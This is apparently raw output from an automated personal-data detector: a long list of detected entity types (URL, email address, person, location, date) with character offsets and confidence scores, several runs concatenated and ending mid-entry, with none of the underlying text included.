URL, start: 2590, end: 2597, score: 0.5, type: URL, start: 2610, end: 2617, score: 0.5, type: URL, start: 2635, end: 2642, score: 0.5, type: URL, start: 2805, end: 2812, score: 0.5, type: URL, start: 2833, end: 2839, score: 0.5, type: URL, start: 2934, end: 2940, score: 0.5, type: URL, start: 2969, end: 2976, score: 0.5, type: URL, start: 3076, end: 3083, score: 0.5, type: URL, start: 3105, end: 3111, score: 0.5, type: URL, start: 3342, end: 3364, score: 0.5, type: URL, start: 3430, end: 3437, score: 0.5, type: URL, start: 3447, end: 3456, score: 0.5, type: URL, start: 3473, end: 3480, score: 0.5, type: URL, start: 3506, end: 3513, score: 0.5, type: URL, start: 3577, end: 3584, score: 0.5, type: URL, start: 3605, end: 3612, score: 0.5, type: URL, start: 3650, end: 3661, score: 0.5, type: EMAIL_ADDRESS, start: 122, end: 137, score: 1.0, type: URL, start: 146, end: 166, score: 0.95, type: DATE_TIME, start: 76, end: 85, score: 0.85, type: PERSON, start: 109, end: 121, score: 0.85, type: DATE_TIME, start: 234, end: 249, score: 0.85, type: LOCATION, start: 1021, end: 1030, score: 0.85, type: PERSON, start: 1166, end: 1169, score: 0.85, type: LOCATION, start: 1427, end: 1436, score: 0.85, type: PERSON, start: 1469, end: 1472, score: 0.85, type: PERSON, start: 1574, end: 1588, score: 0.85, type: PERSON, start: 1887, end: 1901, score: 0.85, type: LOCATION, start: 2053, end: 2061, score: 0.85, type: PERSON, start: 2580, end: 2589, score: 0.85, type: PERSON, start: 3166, end: 3174, score: 0.85, type: PERSON, start: 3669, end: 3678, score: 0.85, type: PERSON, start: 3983, end: 3992, score: 0.85, type: PERSON, start: 4761, end: 4770, score: 0.85, type: LOCATION, start: 4916, end: 4919, score: 0.85, type: LOCATION, start: 5231, end: 5234, score: 0.85, type: LOCATION, start: 5442, end: 5451, score: 0.85, type: URL, start: 339, end: 373, score: 0.6, type: URL, start: 1605, end: 1640, score: 0.6, type: URL, start: 128, end: 137, score: 0.5, type: URL, start: 220, end: 233, score: 0.5, type: URL, start: 577, end: 584, score: 0.5, type: URL, start: 637, end: 661, score: 0.5, type: URL, start: 734, end: 739, score: 0.5, type: URL, start: 766, end: 774, score: 0.5, type: URL, start: 3144, end: 3155, score: 0.5, type: URL, start: 4497, end: 4501, score: 0.5, type: URL, start: 4600, end: 4607, score: 0.5, type: URL, start: 5626, end: 5631, score: 0.5, type: URL, start: 5679, end: 5683, score: 0.5, type: EMAIL_ADDRESS, start: 2283, end: 2298, score: 1.0, type: NRP, start: 174, end: 186, score: 0.85, type: NRP, start: 215, end: 227, score: 0.85, type: LOCATION, start: 355, end: 362, score: 0.85, type: LOCATION, start: 513, end: 517, score: 0.85, type: PERSON, start: 591, end: 595, score: 0.85, type: PERSON, start: 963, end: 978, score: 0.85, type: PERSON, start: 985, end: 991, score: 0.85, type: PERSON, start: 1821, end: 1853, score: 0.85, type: NRP, start: 3427, end: 3445, score: 0.85, type: LOCATION, start: 4886, end: 4899, score: 0.85, type: PERSON, start: 5067, end: 5080, score: 0.85, type: NRP, start: 5689, end: 5701, score: 0.85, type: PERSON, start: 7056, end: 7075, score: 0.85, type: PERSON, start: 7287, end: 7306, score: 0.85, type: PERSON, start: 7417, end: 7436, score: 0.85, type: PERSON, start: 8351, end: 8359, score: 0.85, type: PERSON, start: 9584, end: 9607, score: 0.85, type: PERSON, start: 9609, end: 9636, score: 0.85, type: URL, start: 174, end: 186, score: 0.5, type: URL, start: 215, end: 227, score: 0.5, type: URL, start: 432, end: 437, score: 0.5, type: URL, start: 963, end: 974, score: 0.5, type: URL, start: 1009, end: 1014, score: 0.5, type: URL, start: 1079, end: 1090, score: 0.5, type: URL, start: 1126, end: 1136, score: 0.5, type: URL, start: 1184, end: 1189, score: 0.5, type: URL, start: 1266, end: 1272, score: 0.5, type: URL, start: 1473, end: 1480, score: 0.5, type: URL, start: 1541, end: 1548, score: 0.5, type: URL, start: 1583, end: 1590, score: 0.5, type: URL, start: 1621, end: 1628, score: 0.5, type: URL, start: 1679, end: 1689, score: 0.5, type: URL, start: 1717, end: 1721, score: 0.5, type: URL, start: 1764, end: 1768, score: 0.5, type: URL, start: 1867, end: 1876, score: 0.5, type: URL, start: 1898, end: 1908, score: 0.5, type: URL, start: 1919, end: 1925, score: 0.5, type: URL, start: 1956, end: 1965, score: 0.5, type: URL, start: 2066, end: 2075, score: 0.5, type: URL, start: 2289, end: 2298, score: 0.5, type: URL, start: 2595, end: 2604, score: 0.5, type: URL, start: 2653, end: 2659, score: 0.5, type: URL, start: 2792, end: 2798, score: 0.5, type: URL, start: 2917, end: 2924, score: 0.5, type: URL, start: 3114, end: 3124, score: 0.5, type: URL, start: 3247, end: 3253, score: 0.5, type: URL, start: 3298, end: 3305, score: 0.5, type: URL, start: 3471, end: 3478, score: 0.5, type: URL, start: 3579, end: 3586, score: 0.5, type: URL, start: 3692, end: 3699, score: 0.5, type: URL, start: 4424, end: 4434, score: 0.5, type: URL, start: 5291, end: 5297, score: 0.5, type: URL, start: 6075, end: 6082, score: 0.5, type: URL, start: 6137, end: 6144, score: 0.5, type: URL, start: 6213, end: 6219, score: 0.5, type: URL, start: 6447, end: 6454, score: 0.5, type: URL, start: 6861, end: 6868, score: 0.5, type: URL, start: 7635, end: 7641, score: 0.5, type: URL, start: 7787, end: 7796, score: 0.5, type: URL, start: 7912, end: 7921, score: 0.5, type: URL, start: 8025, end: 8034, score: 0.5, type: URL, start: 8133, end: 8142, score: 0.5, type: URL, start: 8236, end: 8245, score: 0.5, type: URL, start: 8351, end: 8357, score: 0.5, type: URL, start: 8418, end: 8427, score: 0.5, type: URL, start: 8556, end: 8565, score: 0.5, type: URL, start: 8768, end: 8777, score: 0.5, type: URL, start: 8955, end: 8965, score: 0.5, type: URL, start: 9062, end: 9072, score: 0.5, type: URL, start: 9446, end: 9456, score: 0.5, type: URL, start: 9609, end: 9619, score: 0.5, type: URL, start: 9643, end: 9653, score: 0.5, type: URL, start: 9817, end: 9824, score: 0.5, type: EMAIL_ADDRESS, start: 67, end: 82, score: 1.0, type: EMAIL_ADDRESS, start: 108, end: 123, score: 1.0, type: EMAIL_ADDRESS, start: 150, end: 165, score: 1.0, type: EMAIL_ADDRESS, start: 194, end: 209, score: 1.0, type: PERSON, start: 48, end: 66, score: 0.85, type: PERSON, start: 93, end: 107, score: 0.85, type: LOCATION, start: 666, end: 675, score: 0.85, type: PERSON, start: 1208, end: 1223, score: 0.85, type: LOCATION, start: 1458, end: 1463, score: 0.85, type: LOCATION, start: 1913, end: 1918, score: 0.85, type: LOCATION, start: 2353, end: 2362, score: 0.85, type: LOCATION, start: 2428, end: 2437, score: 0.85, type: LOCATION, start: 2667, end: 2676, score: 0.85, type: PERSON, start: 3408, end: 3420, score: 0.85, type: LOCATION, start: 4095, end: 4104, score: 0.85, type: LOCATION, start: 4546, end: 4558, score: 0.85, type: PERSON, start: 4948, end: 4960, score: 0.85, type: PERSON, start: 5137, end: 5152, score: 0.85, type: NRP, start: 6197, end: 6206, score: 0.85, type: LOCATION, start: 6376, end: 6385, score: 0.85, type: LOCATION, start: 6432, end: 6441, score: 0.85, type: LOCATION, start: 6858, end: 6867, score: 0.85, type: LOCATION, start: 6914, end: 6923, score: 0.85, type: LOCATION, start: 7071, end: 7080, score: 0.85, type: LOCATION, start: 7082, end: 7094, score: 0.85, type: LOCATION, start: 7558, end: 7567, score: 0.85, type: LOCATION, start: 7616, end: 7625, score: 0.85, type: LOCATION, start: 7895, end: 7904, score: 0.85, type: PERSON, start: 8506, end: 8518, score: 0.85, type: LOCATION, start: 8617, end: 8626, score: 0.85, type: LOCATION, start: 8898, end: 8907, score: 0.85, type: LOCATION, start: 9703, end: 9712, score: 0.85, type: LOCATION, start: 9754, end: 9763, score: 0.85, type: LOCATION, start: 9911, end: 9920, score: 0.85, type: LOCATION, start: 9922, end: 9934, score: 0.85, type: LOCATION, start: 10352, end: 10361, score: 0.85, type: LOCATION, start: 10363, end: 10375, score: 0.85, type: LOCATION, start: 10405, end: 10414, score: 0.85, type: PERSON, start: 10456, end: 10468, score: 0.85, type: LOCATION, start: 10569, end: 10578, score: 0.85, type: LOCATION, start: 11327, end: 11336, score: 0.85, type: PERSON, start: 11542, end: 11554, score: 0.85, type: LOCATION, start: 12006, end: 12015, score: 0.85, type: LOCATION, start: 12935, end: 12940, score: 0.85, type: LOCATION, start: 14526, end: 14538, score: 0.85, type: DATE_TIME, start: 15609, end: 15613, score: 0.85, type: PERSON, start: 15715, end: 15732, score: 0.85, type: PERSON, start: 15734, end: 15750, score: 0.85, type: PERSON, start: 15755, end: 15766, score: 0.85, type: NRP, start: 16238, end: 16247, score: 0.85, type: LOCATION, start: 16529, end: 16538, score: 0.85, type: LOCATION, start: 16585, end: 16594, score: 0.85, type: LOCATION, start: 16956, end: 16965, score: 0.85, type: LOCATION, start: 17014, end: 17023, score: 0.85, type: LOCATION, start: 17164, end: 17173, score: 0.85, type: PERSON, start: 17357, end: 17364, score: 0.85, type: LOCATION, start: 17741, end: 17750, score: 0.85, type: PERSON, start: 17792, end: 17799, score: 0.85, type: LOCATION, start: 18055, end: 18071, score: 0.85, type: LOCATION, start: 18073, end: 18085, score: 0.85, type: LOCATION, start: 18655, end: 18664, score: 0.85, type: LOCATION, start: 18706, end: 18715, score: 0.85, type: LOCATION, start: 18863, end: 18872, score: 0.85, type: LOCATION, start: 18874, end: 18886, score: 0.85, type: LOCATION, start: 19282, end: 19291, score: 0.85, type: LOCATION, start: 19333, end: 19342, score: 0.85, type: LOCATION, start: 19490, end: 19499, score: 0.85, type: LOCATION, start: 19501, end: 19513, score: 0.85, type: LOCATION, start: 19873, end: 19882, score: 0.85, type: LOCATION, start: 19884, end: 19896, score: 0.85, type: LOCATION, start: 19926, end: 19935, score: 0.85, type: PERSON, start: 19977, end: 19989, score: 0.85, type: LOCATION, start: 20090, end: 20099, score: 0.85, type: IP_ADDRESS, start: 3457, end: 3471, score: 0.6, type: IP_ADDRESS, start: 12209, end: 12211, score: 0.6, type: URL, start: 73, end: 82, score: 0.5, type: URL, start: 114, end: 123, score: 0.5, type: URL, start: 156, end: 165, score: 0.5, type: URL, start: 200, end: 209, score: 0.5, type: URL, start: 365, end: 369, score: 0.5, type: URL, start: 1601, end: 1606, score: 0.5, type: URL, start: 1742, end: 1747, score: 0.5, type: URL, start: 1981, end: 1992, score: 0.5, type: URL, start: 2701, end: 2706, score: 0.5, type: URL, start: 3032, end: 3040, score: 0.5, type: URL, start: 5653, end: 5663, score: 0.5, type: URL, start: 5698, end: 5703, score: 0.5, type: URL, start: 5805, end: 5811, score: 0.5, type: URL, start: 6197, end: 6204, score: 0.5, type: URL, start: 7297, end: 7301, score: 0.5, type: URL, start: 7919, end: 7923, score: 0.5, type: URL, start: 7962, end: 7969, score: 0.5, type: URL, start: 8003, end: 8010, score: 0.5, type: URL, start: 8016, end: 8021, score: 0.5, type: URL, start: 8048, end: 8055, score: 0.5, type: URL, start: 8077, end: 8086, score: 0.5, type: URL, start: 8348, end: 8356, score: 0.5, type: URL, start: 8376, end: 8381, score: 0.5, type: URL, start: 8432, end: 8440, score: 0.5, type: URL, start: 9191, end: 9196, score: 0.5, type: URL, start: 9240, end: 9248, score: 0.5, type: URL, start: 9259, end: 9267, score: 0.5, type: URL, start: 9983, end: 9990, score: 0.5, type: URL, start: 10027, end: 10034, score: 0.5, type: URL, start: 10074, end: 10082, score: 0.5, type: URL, start: 10778, end: 10786, score: 0.5, type: URL, start: 10798, end: 10805, score: 0.5, type: URL, start: 11023, end: 11029, score: 0.5, type: URL, start: 11302, end: 11308, score: 0.5, type: URL, start: 11351, end: 11355, score: 0.5, type: URL, start: 11407, end: 11414, score: 0.5, type: URL, start: 11432, end: 11437, score: 0.5, type: URL, start: 11439, end: 11444, score: 0.5, type: URL, start: 11450, end: 11458, score: 0.5, type: URL, start: 11471, end: 11479, score: 0.5, type: URL, start: 11672, end: 11679, score: 0.5, type: URL, start: 11691, end: 11696, score: 0.5, type: URL, start: 11698, end: 11706, score: 0.5, type: URL, start: 11843, end: 11851, score: 0.5, type: URL, start: 12187, end: 12194, score: 0.5, type: URL, start: 12626, end: 12633, score: 0.5, type: URL, start: 12658, end: 12662, score: 0.5, type: URL, start: 12697, end: 12701, score: 0.5, type: URL, start: 12717, end: 12724, score: 0.5, type: URL, start: 12735, end: 12744, score: 0.5, type: URL, start: 12746, end: 12753, score: 0.5, type: URL, start: 12796, end: 12801, score: 0.5, type: URL, start: 12807, end: 12814, score: 0.5, type: URL, start: 12876, end: 12883, score: 0.5, type: URL, start: 14910, end: 14920, score: 0.5, type: URL, start: 14965, end: 14970, score: 0.5, type: URL, start: 15082, end: 15088, score: 0.5, type: URL, start: 16238, end: 16245, score: 0.5, type: URL, start: 16263, end: 16270, score: 0.5, type: URL, start: 16337, end: 16344, score: 0.5, type: URL, start: 17683, end: 17688, score: 0.5, type: URL, start: 17720, end: 17727, score: 0.5, type: URL, start: 17753, end: 17757, score: 0.5, type: URL, start: 17841, end: 17848, score: 0.5, type: URL, start: 17854, end: 17859, score: 0.5, type: URL, start: 17890, end: 17897, score: 0.5, type: URL, start: 17966, end: 17970, score: 0.5, type: URL, start: 18127, end: 18134, score: 0.5, type: URL, start: 18330, end: 18336, score: 0.5, type: URL, start: 18377, end: 18385, score: 0.5, type: URL, start: 18405, end: 18410, score: 0.5, type: URL, start: 18461, end: 18469, score: 0.5, type: URL, start: 18999, end: 19006, score: 0.5, type: URL, start: 19043, end: 19050, score: 0.5, type: URL, start: 19086, end: 19094, score: 0.5, type: URL, start: 19602, end: 19610, score: 0.5, type: URL, start: 20367, end: 20375, score: 0.5, type: URL, start: 20396, end: 20403, score: 0.5, type: URL, start: 20458, end: 20465, score: 0.5, type: EMAIL_ADDRESS, start: 1992, end: 2007, score: 1.0, type: EMAIL_ADDRESS, start: 2075, end: 2090, score: 1.0, type: EMAIL_ADDRESS, start: 2151, end: 2166, score: 1.0, type: EMAIL_ADDRESS, start: 2229, end: 2244, score: 1.0, type: EMAIL_ADDRESS, start: 7697, end: 7712, score: 1.0, type: LOCATION, start: 524, end: 536, score: 0.85, type: LOCATION, start: 817, end: 820, score: 0.85, type: LOCATION, start: 1252, end: 1266, score: 0.85, type: LOCATION, start: 1466, end: 1479, score: 0.85, type: LOCATION, start: 1768, end: 1773, score: 0.85, type: LOCATION, start: 1777, end: 1786, score: 0.85, type: LOCATION, start: 1790, end: 1796, score: 0.85, type: LOCATION, start: 1800, end: 1806, score: 0.85, type: LOCATION, start: 1810, end: 1816, score: 0.85, type: LOCATION, start: 1820, end: 1825, score: 0.85, type: LOCATION, start: 1829, end: 1835, score: 0.85, type: LOCATION, start: 1839, end: 1844, score: 0.85, type: LOCATION, start: 2332, end: 2344, score: 0.85, type: LOCATION, start: 3734, end: 3741, score: 0.85, type: LOCATION, start: 3754, end: 3758, score: 0.85, type: PERSON, start: 3771, end: 3775, score: 0.85, type: PERSON, start: 3821, end: 3839, score: 0.85, type: PERSON, start: 3864, end: 3868, score: 0.85, type: PERSON, start: 3875, end: 3881, score: 0.85, type: PERSON, start: 4143, end: 4146, score: 0.85, type: PERSON, start: 4451, end: 4455, score: 0.85, type: PERSON, start: 4459, end: 4462, score: 0.85, type: PERSON, start: 4466, end: 4471, score: 0.85, type: PERSON, start: 4475, end: 4479, score: 0.85, type: PERSON, start: 4483, end: 4487, score: 0.85, type: PERSON, start: 4500, end: 4506, score: 0.85, type: PERSON, start: 4520, end: 4524, score: 0.85, type: PERSON, start: 4538, end: 4545, score: 0.85, type: PERSON, start: 4563, end: 4568, score: 0.85, type: PERSON, start: 4572, end: 4578, score: 0.85, type: PERSON, start: 4621, end: 4628, score: 0.85, type: NRP, start: 4749, end: 4773, score: 0.85, type: DATE_TIME, start: 5226, end: 5231, score: 0.85, type: LOCATION, start: 7715, end: 7728, score: 0.85, type: LOCATION, start: 11135, end: 11143, score: 0.85, type: LOCATION, start: 13136, end: 13149, score: 0.85, type: NRP, start: 13251, end: 13281, score: 0.85, type: PERSON, start: 13499, end: 13511, score: 0.85, type: PERSON, start: 15136, end: 15148, score: 0.85, type: PERSON, start: 15568, end: 15574, score: 0.85, type: NRP, start: 17377, end: 17388, score: 0.85, type: PERSON, start: 18310, end: 18315, score: 0.85, type: LOCATION, start: 25640, end: 25650, score: 0.85, type: PERSON, start: 29783, end: 29789, score: 0.85, type: DATE_TIME, start: 29940, end: 29977, score: 0.85, type: URL, start: 9778, end: 9843, score: 0.6, type: URL, start: 252, end: 261, score: 0.5, type: URL, start: 285, end: 307, score: 0.5, type: URL, start: 329, end: 343, score: 0.5, type: URL, start: 390, end: 415, score: 0.5, type: URL, start: 624, end: 641, score: 0.5, type: URL, start: 666, end: 674, score: 0.5, type: URL, start: 720, end: 737, score: 0.5, type: URL, start: 854, end: 868, score: 0.5, type: URL, start: 1000, end: 1018, score: 0.5, type: URL, start: 1049, end: 1062, score: 0.5, type: URL, start: 1090, end: 1098, score: 0.5, type: URL, start: 1138, end: 1151, score: 0.5, type: URL, start: 1172, end: 1181, score: 0.5, type: URL, start: 1305, end: 1320, score: 0.5, type: URL, start: 1573, end: 1583, score: 0.5, type: URL, start: 1998, end: 2007, score: 0.5, type: URL, start: 2081, end: 2090, score: 0.5, type: URL, start: 2157, end: 2166, score: 0.5, type: URL, start: 2235, end: 2244, score: 0.5, type: URL, start: 5479, end: 5488, score: 0.5, type: URL, start: 5661, end: 5674, score: 0.5, type: URL, start: 5750, end: 5759, score: 0.5, type: URL, start: 5848, end: 5857, score: 0.5, type: URL, start: 5958, end: 5967, score: 0.5, type: URL, start: 6063, end: 6076, score: 0.5, type: URL, start: 6160, end: 6169, score: 0.5, type: URL, start: 6346, end: 6354, score: 0.5, type: URL, start: 6665, end: 6672, score: 0.5, type: URL, start: 6821, end: 6828, score: 0.5, type: URL, start: 7235, end: 7242, score: 0.5, type: URL, start: 7340, end: 7351, score: 0.5, type: URL, start: 7605, end: 7618, score: 0.5, type: URL, start: 7659, end: 7674, score: 0.5, type: URL, start: 7703, end: 7712, score: 0.5, type: URL, start: 7811, end: 7818, score: 0.5, type: URL, start: 7866, end: 7873, score: 0.5, type: URL, start: 7898, end: 7905, score: 0.5, type: URL, start: 7933, end: 7940, score: 0.5, type: URL, start: 7966, end: 7973, score: 0.5, type: URL, start: 7999, end: 8006, score: 0.5, type: URL, start: 8032, end: 8039, score: 0.5, type: URL, start: 8064, end: 8071, score: 0.5, type: URL, start: 8497, end: 8504, score: 0.5, type: URL, start: 8641, end: 8651, score: 0.5, type: URL, start: 8945, end: 8952, score: 0.5, type: URL, start: 8988, end: 8995, score: 0.5, type: URL, start: 9012, end: 9018, score: 0.5, type: URL, start: 9056, end: 9062, score: 0.5, type: URL, start: 9126, end: 9132, score: 0.5, type: URL, start: 9187, end: 9202, score: 0.5, type: URL, start: 9205, end: 9214, score: 0.5, type: URL, start: 9310, end: 9317, score: 0.5, type: URL, start: 9318, end: 9329, score: 0.5, type: URL, start: 9451, end: 9464, score: 0.5, type: URL, start: 9493, end: 9500, score: 0.5, type: URL, start: 9929, end: 9943, score: 0.5, type: URL, start: 10389, end: 10397, score: 0.5, type: URL, start: 11168, end: 11192, score: 0.5, type: URL, start: 11276, end: 11280, score: 0.5, type: URL, start: 11286, end: 11297, score: 0.5, type: URL, start: 11338, end: 11362, score: 0.5, type: URL, start: 11401, end: 11414, score: 0.5, type: URL, start: 11742, end: 11756, score: 0.5, type: URL, start: 11900, end: 11914, score: 0.5, type: URL, start: 11919, end: 11926, score: 0.5, type: URL, start: 11975, end: 11986, score: 0.5, type: URL, start: 12215, end: 12228, score: 0.5, type: URL, start: 12321, end: 12327, score: 0.5, type: URL, start: 12482, end: 12488, score: 0.5, type: URL, start: 12619, end: 12623, score: 0.5, type: URL, start: 12644, end: 12659, score: 0.5, type: URL, start: 12664, end: 12673, score: 0.5, type: URL, start: 12722, end: 12735, score: 0.5, type: URL, start: 13066, end: 13081, score: 0.5, type: URL, start: 13107, end: 13113, score: 0.5, type: URL, start: 13128, end: 13134, score: 0.5, type: URL, start: 13217, end: 13224, score: 0.5, type: URL, start: 13251, end: 13257, score: 0.5, type: URL, start: 13302, end: 13315, score: 0.5, type: URL, start: 13560, end: 13566, score: 0.5, type: URL, start: 13629, end: 13647, score: 0.5, type: URL, start: 13886, end: 13899, score: 0.5, type: URL, start: 14144, end: 14150, score: 0.5, type: URL, start: 14219, end: 14242, score: 0.5, type: URL, start: 14491, end: 14497, score: 0.5, type: URL, start: 14548, end: 14561, score: 0.5, type: URL, start: 14806, end: 14812, score: 0.5, type: URL, start: 14916, end: 14931, score: 0.5, type: URL, start: 15028, end: 15043, score: 0.5, type: URL, start: 15046, end: 15055, score: 0.5, type: URL, start: 15136, end: 15144, score: 0.5, type: URL, start: 15179, end: 15187, score: 0.5, type: URL, start: 15211, end: 15217, score: 0.5, type: URL, start: 15264, end: 15277, score: 0.5, type: URL, start: 15522, end: 15528, score: 0.5, type: URL, start: 15592, end: 15600, score: 0.5, type: URL, start: 15604, end: 15614, score: 0.5, type: URL, start: 15693, end: 15706, score: 0.5, type: URL, start: 15939, end: 15945, score: 0.5, type: URL, start: 16087, end: 16093, score: 0.5, type: URL, start: 16149, end: 16162, score: 0.5, type: URL, start: 16659, end: 16665, score: 0.5, type: URL, start: 16716, end: 16726, score: 0.5, type: URL, start: 16760, end: 16766, score: 0.5, type: URL, start: 16822, end: 16835, score: 0.5, type: URL, start: 17143, end: 17167, score: 0.5, type: URL, start: 17403, end: 17409, score: 0.5, type: URL, start: 17435, end: 17442, score: 0.5, type: URL, start: 17793, end: 17801, score: 0.5, type: URL, start: 18015, end: 18021, score: 0.5, type: URL, start: 18170, end: 18178, score: 0.5, type: URL, start: 18265, end: 18272, score: 0.5, type: URL, start: 18330, end: 18338, score: 0.5, type: URL, start: 18452, end: 18460, score: 0.5, type: URL, start: 18566, end: 18574, score: 0.5, type: URL, start: 18674, end: 18682, score: 0.5, type: URL, start: 19041, end: 19049, score: 0.5, type: URL, start: 19122, end: 19130, score: 0.5, type: URL, start: 19202, end: 19210, score: 0.5, type: URL, start: 19641, end: 19647, score: 0.5, type: URL, start: 19783, end: 19789, score: 0.5, type: URL, start: 19929, end: 19935, score: 0.5, type: URL, start: 20092, end: 20098, score: 0.5, type: URL, start: 20140, end: 20144, score: 0.5, type: URL, start: 20164, end: 20168, score: 0.5, type: URL, start: 20179, end: 20187, score: 0.5, type: URL, start: 20196, end: 20200, score: 0.5, type: URL, start: 20575, end: 20582, score: 0.5, type: URL, start: 20729, end: 20738, score: 0.5, type: URL, start: 20846, end: 20854, score: 0.5, type: URL, start: 22017, end: 22023, score: 0.5, type: URL, start: 22253, end: 22259, score: 0.5, type: URL, start: 22400, end: 22406, score: 0.5, type: URL, start: 22611, end: 22617, score: 0.5, type: URL, start: 22848, end: 22854, score: 0.5, type: URL, start: 23105, end: 23111, score: 0.5, type: URL, start: 23348, end: 23354, score: 0.5, type: URL, start: 23600, end: 23606, score: 0.5, type: URL, start: 23805, end: 23829, score: 0.5, type: URL, start: 24018, end: 24042, score: 0.5, type: URL, start: 24288, end: 24302, score: 0.5, type: URL, start: 24439, end: 24445, score: 0.5, type: URL, start: 24490, end: 24497, score: 0.5, type: URL, start: 24542, end: 24556, score: 0.5, type: URL, start: 24636, end: 24644, score: 0.5, type: URL, start: 24683, end: 24690, score: 0.5, type: URL, start: 24771, end: 24778, score: 0.5, type: URL, start: 25185, end: 25191, score: 0.5, type: URL, start: 25223, end: 25229, score: 0.5, type: URL, start: 25279, end: 25285, score: 0.5, type: URL, start: 25311, end: 25319, score: 0.5, type: URL, start: 25427, end: 25433, score: 0.5, type: URL, start: 25484, end: 25501, score: 0.5, type: URL, start: 25629, end: 25636, score: 0.5, type: URL, start: 25640, end: 25648, score: 0.5, type: URL, start: 25675, end: 25681, score: 0.5, type: URL, start: 25707, end: 25719, score: 0.5, type: URL, start: 25791, end: 25799, score: 0.5, type: URL, start: 25899, end: 25905, score: 0.5, type: URL, start: 25968, end: 25986, score: 0.5, type: URL, start: 26010, end: 26016, score: 0.5, type: URL, start: 26066, end: 26076, score: 0.5, type: URL, start: 26154, end: 26161, score: 0.5, type: URL, start: 26165, end: 26175, score: 0.5, type: URL, start: 26177, end: 26183, score: 0.5, type: URL, start: 26201, end: 26208, score: 0.5, type: URL, start: 26263, end: 26269, score: 0.5, type: URL, start: 26466, end: 26472, score: 0.5, type: URL, start: 26502, end: 26508, score: 0.5, type: URL, start: 26522, end: 26528, score: 0.5, type: URL, start: 26567, end: 26585, score: 0.5, type: URL, start: 26730, end: 26736, score: 0.5, type: URL, start: 26968, end: 26986, score: 0.5, type: URL, start: 27021, end: 27036, score: 0.5, type: URL, start: 27146, end: 27153, score: 0.5, type: URL, start: 27157, end: 27168, score: 0.5, type: URL, start: 27218, end: 27225, score: 0.5, type: URL, start: 27307, end: 27318, score: 0.5, type: URL, start: 27357, end: 27363, score: 0.5, type: URL, start: 27608, end: 27616, score: 0.5, type: URL, start: 27682, end: 27688, score: 0.5, type: URL, start: 27801, end: 27807, score: 0.5, type: URL, start: 27850, end: 27856, score: 0.5, type: URL, start: 27879, end: 27885, score: 0.5, type: URL, start: 27967, end: 27985, score: 0.5, type: URL, start: 28071, end: 28077, score: 0.5, type: URL, start: 28112, end: 28127, score: 0.5, type: URL, start: 28250, end: 28256, score: 0.5, type: URL, start: 29057, end: 29065, score: 0.5, type: URL, start: 29160, end: 29171, score: 0.5, type: URL, start: 29766, end: 29772, score: 0.5, type: URL, start: 29912, end: 29923, score: 0.5, type: URL, start: 29931, end: 29942, score: 0.5, type: URL, start: 30013, end: 30020, score: 0.5, type: URL, start: 30056, end: 30063, score: 0.5, type: URL, start: 30345, end: 30358, score: 0.5, type: URL, start: 30557, end: 30570, score: 0.5, type: LOCATION, start: 229, end: 237, score: 0.85, type: LOCATION, start: 889, end: 904, score: 0.85, type: LOCATION, start: 1499, end: 1514, score: 0.85, type: LOCATION, start: 2736, end: 2751, score: 0.85, type: NRP, start: 2767, end: 2788, score: 0.85, type: LOCATION, start: 4100, end: 4115, score: 0.85, type: NRP, start: 4131, end: 4152, score: 0.85, type: URL, start: 6366, end: 6381, score: 0.85, type: URL, start: 6987, end: 7002, score: 0.85, type: URL, start: 31, end: 38, score: 0.5, type: URL, start: 63, end: 77, score: 0.5, type: URL, start: 109, end: 123, score: 0.5, type: URL, start: 151, end: 159, score: 0.5, type: URL, start: 335, end: 343, score: 0.5, type: URL, start: 401, end: 416, score: 0.5, type: URL, start: 483, end: 494, score: 0.5, type: URL, start: 522, end: 527, score: 0.5, type: URL, start: 547, end: 566, score: 0.5, type: URL, start: 607, end: 612, score: 0.5, type: URL, start: 634, end: 653, score: 0.5, type: URL, start: 744, end: 755, score: 0.5, type: URL, start: 797, end: 802, score: 0.5, type: URL, start: 824, end: 843, score: 0.5, type: URL, start: 1016, end: 1031, score: 0.5, type: URL, start: 1092, end: 1103, score: 0.5, type: URL, start: 1131, end: 1136, score: 0.5, type: URL, start: 1156, end: 1175, score: 0.5, type: URL, start: 1216, end: 1221, score: 0.5, type: URL, start: 1243, end: 1262, score: 0.5, type: URL, start: 1354, end: 1365, score: 0.5, type: URL, start: 1407, end: 1412, score: 0.5, type: URL, start: 1434, end: 1453, score: 0.5, type: URL, start: 1591, end: 1607, score: 0.5, type: URL, start: 1667, end: 1678, score: 0.5, type: URL, start: 1720, end: 1725, score: 0.5, type: URL, start: 1747, end: 1766, score: 0.5, type: URL, start: 1883, end: 1898, score: 0.5, type: URL, start: 1966, end: 1977, score: 0.5, type: URL, start: 2005, end: 2010, score: 0.5, type: URL, start: 2030, end: 2049, score: 0.5, type: URL, start: 2090, end: 2095, score: 0.5, type: URL, start: 2117, end: 2136, score: 0.5, type: URL, start: 2183, end: 2202, score: 0.5, type: URL, start: 2241, end: 2246, score: 0.5, type: URL, start: 2274, end: 2293, score: 0.5, type: URL, start: 2363, end: 2374, score: 0.5, type: URL, start: 2402, end: 2407, score: 0.5, type: URL, start: 2427, end: 2446, score: 0.5, type: URL, start: 2487, end: 2492, score: 0.5, type: URL, start: 2514, end: 2533, score: 0.5, type: URL, start: 2575, end: 2580, score: 0.5, type: URL, start: 2608, end: 2627, score: 0.5, type: URL, start: 2674, end: 2693, score: 0.5, type: URL, start: 2966, end: 2976, score: 0.5, type: URL, start: 3037, end: 3048, score: 0.5, type: URL, start: 3076, end: 3081, score: 0.5, type: URL, start: 3101, end: 3120, score: 0.5, type: URL, start: 3169, end: 3188, score: 0.5, type: URL, start: 3254, end: 3269, score: 0.5, type: URL, start: 3330, end: 3341, score: 0.5, type: URL, start: 3369, end: 3374, score: 0.5, type: URL, start: 3394, end: 3413, score: 0.5, type: URL, start: 3454, end: 3459, score: 0.5, type: URL, start: 3481, end: 3500, score: 0.5, type: URL, start: 3547, end: 3566, score: 0.5, type: URL, start: 3605, end: 3610, score: 0.5, type: URL, start: 3638, end: 3657, score: 0.5, type: URL, start: 3727, end: 3738, score: 0.5, type: URL, start: 3766, end: 3771, score: 0.5, type: URL, start: 3791, end: 3810, score: 0.5, type: URL, start: 3851, end: 3856, score: 0.5, type: URL, start: 3878, end: 3897, score: 0.5, type: URL, start: 3939, end: 3944, score: 0.5, type: URL, start: 3972, end: 3991, score: 0.5, type: URL, start: 4038, end: 4057, score: 0.5, type: URL, start: 4276, end: 4291, score: 0.5, type: URL, start: 4367, end: 4378, score: 0.5, type: URL, start: 4406, end: 4411, score: 0.5, type: URL, start: 4431, end: 4450, score: 0.5, type: URL, start: 4491, end: 4496, score: 0.5, type: URL, start: 4518, end: 4537, score: 0.5, type: URL, start: 4573, end: 4588, score: 0.5, type: URL, 